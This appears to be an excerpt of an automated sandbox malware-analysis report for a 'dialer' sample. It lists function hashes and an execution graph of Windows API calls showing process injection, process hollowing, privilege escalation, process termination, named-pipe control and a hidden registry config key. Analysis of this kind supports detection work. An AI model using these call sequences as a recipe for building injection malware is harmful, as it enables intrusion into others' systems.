                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 7121fcdbde6feb512a79f64f3a4f84ebfa020095b1d877e238ca44cd6c43436a
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 6F615933600F888AEB24DF65D84439DB7A0F348BC9F046225EF4917B98DB38D695CB24
                        Function 000002534CF6A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: d29e46e796442fbccaa45ff0a69f107d8e9040b97be0a3088541bfeca930ac41
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: CB518332200B88CAEB74CF25984835877A0F355BC6F186125DA5947BE5CB3ED662CB38
                        Function 000002534CF9AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: b2573f3a0e28ec7478961297ebaffcae1255a42cea17601f1662b17ba3d280ba
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 56518F72100A888AEF64CF269988359B7A0F355BCAF146126DB5A47BD5CB3CD650CF38
                        Function 000002534CF68405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: d38a37f33ebef9b0ae7e466fc22341eb2192eec7cd92f292bae3f12aaefec7e9
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: D451C432702A088BEB14CF15D848B1937A5F354BEDF94A129DA1643798EB7CDE42C738
                        Function 000002534CF683E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: aed1aa7a57b0562c17815b3342e8100724a32f9ff8f88b3be7356df183102d8f
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: CE318D72302A4896E714DF11EC4871977A4F344BDAF959018EE5B077A9DB3CDA42C738
                        Function 000002534CFA2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: 715c1de296ad208afb584ecc119e70067c5410cf6b00ecc694a14cda3edd43db
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 48D13272714E8889E711CFB9D8443ACBBB1F344BD9F109216CE5D97B9ADA39C206C364
                        Function 000002534CF914A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 511a5390475af39f0f30f5d2462ff531daa65af7d341b937ecda168f05fedca0
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: 51015A36600F98C6E704DF66ED0814ABBA0F78DFC2F059425EA5A43729DE38D251C764
                        Function 000002534CFA2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 642866cb780f391581793c658500856a692f819b9db5c5c0d868ab1e09f5b0b1
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: F191B572700E5895F764DFA588483BDABA0F704FDAF146105DE0E57A85DB3AC682C738
                        Function 000002534CF9253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 15a2a209157c5afce9d35a6a055bd2969ca5ec2551eb7b70c7ff8f74499d5dc7
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: F171F336200F8981EF64DE659C483BAA7A4F385BC6F442126DD0963B99DE39C745CB38
                        Function 000002534CF69E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: b267ec207ab3027cc4c7daeae69c6efacf6b756833aecf8a5b9a9590cd618f48
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: A5615832B00F888AEB20DF65D84439D77A0F354BC9F046215EF8917BA8DB38D696C724
                        Function 000002534CF92330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 7823b1c60e900401edacb558897a0f90a3d51504748f56fa69511ae593b01ec0
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 7451F332604B8981EE74CA69A85C3BAE791F3857C1F842125DD5903B5ADA3DCB048FB8
                        Function 000002534CFA26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: b0f100d0c7057803a38617d554a2cf33ee99a3079565cd0482915e063c1748fe
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 9141C472314F8482EB20DF65E8483A9B7A0F798BD5F545022EE4D87798EB3DC641CB64
                        Function 000002534CF994A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 0dd9abf7dea3feeb9c8a6e8342b82b7a28e66383d326496ca4d594d0f33923bf
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 82115832204F8482EB21CF15E80835AB7E4FB88B95F199220EE8C07B68DF3DC651CB14
                        Function 000002534CF67356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 3718b566d7a0f2adc669c698051cc10a99aae6c4637dbe4262becdd4256b497d
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: BAE08671641F4890EF01CF21EC4429873A0DB58BA4B88A122995C46351FA3CD2E9C320
                        Function 000002534CF673B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 388f0cfffdf7646ae4befc00da2f137d9e7739ca14c356c8d83072b8bc327059
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: E2E08671641F4880EF01CF21D84419873A0E758B94B88A122C94C46311EA3CE2E5C320
                        Function 000002534CF91BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 56ee2fff3bbd0e13e7513dd09ffed2945b9ed838cddbd72046c6ded088ba7054
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: 6A119E39601F4881EE04DB66AC0C269B7A1FB89FC2F19A028DE4D53766DF3DD542C724
                        Function 000002534CF91268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: ccb56dfa411da463c8507d741658e5bace5dd002053283e2c16c8f8ee8116812
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 27E06D39601E0886EB04CF62DC0C34ABAE1FB89F86F06D024C90907351DF7E8599C770

                        Execution Graph

                        Execution Coverage:48.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:38.1%
                        Total number of Nodes:226
                        Total number of Limit Nodes:22
                        execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 CoCreateInstance 597->599 600 140001a4d 597->600 598->559 601 140001b26 CoUninitialize 599->601 602 140001a88 VariantInit 599->602 600->599 600->601 601->598 603 140001ade 602->603 603->601 605 1400014d8 13 API calls 604->605 607 14000179a 605->607 606 1400017c8 GetProcessHeap HeapFree 607->606 608 1400016cc 5 API calls 607->608 608->607 610 140001914 2 API calls 609->610 611 140002191 610->611 613 140001968 ReadFile 612->613 614 14000198b 613->614 615 1400019a5 613->615 614->613 614->615 615->534 615->566 617 140001cbb 616->617 618 140001cce CreateProcessW 617->618 620 140001e97 617->620 622 140001e62 OpenProcess 617->622 624 140001dd2 VirtualAlloc 617->624 626 140001d8c WriteProcessMemory 617->626 618->617 619 140001d2b VirtualAllocEx 618->619 619->617 621 140001d60 WriteProcessMemory 619->621 620->582 621->617 622->617 623 140001e78 TerminateProcess 622->623 623->617 624->617 625 140001df1 GetThreadContext 624->625 625->617 627 140001e09 WriteProcessMemory 625->627 626->617 627->617 628 140001e30 SetThreadContext 627->628 628->617 629 140001e4e ResumeThread 628->629 629->617 629->620 631 1400028f7 GetProcessHeap HeapFree 630->631 632 140002ada WriteFile 630->632 631->582 633 140002b1c CloseHandle 632->633 634 140002afe 632->634 633->631 634->633 635 140002b02 WriteFile 634->635 635->633 637 140001745 636->637 638 1400016eb OpenProcess 636->638 637->581 638->637 639 140001703 638->639 640 14000211c 2 API calls 639->640 641 140001723 640->641 642 14000173c CloseHandle 641->642 643 140001731 CloseHandle 641->643 642->637 643->642

                        Callgraph

                        Executed Functions

                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723836982.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                        • Associated: 0000002D.00000002.2723905391.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_45_2_140000000_dialer.jbxd
                        Similarity
                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                        • API String ID: 4177739653-1130149537
                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000002D.00000002.2723800831.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                        • Associated: 0000002D.00000002.2723728346.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
